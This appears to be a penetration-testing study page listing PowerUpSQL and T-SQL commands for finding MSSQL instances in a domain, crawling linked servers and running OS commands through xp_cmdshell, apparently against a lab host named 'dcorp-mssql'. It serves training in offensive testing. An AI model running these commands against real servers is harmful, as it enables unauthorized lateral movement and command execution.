MSSQL Abuse

Discovery (SPN Scanning)
Get-SQLInstanceDomain

• Check Accessibility
Get-SQLConnectionTestThreaded

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -
Verbose 

• Gather Information
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Look for links to remote servers
Get-SQLServerLink -Instance dcorp-mssql -Verbose
Or
select * from master..sysservers

Enumerating Database Links
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose

Executing Commands
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query
"exec master..xp_cmdshell 'whoami'"

Use PowerUpSQL.ps1

Step 1:
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Step 2:
Get-SQLServerLink -Instance dcorp-mssql -Verbose

Step 3:
Invoke-SQLOSCmd -Verbose -Instance

PreviousForest Persistence NextIntroduction To Azure EntraID

Last updated 3 years ago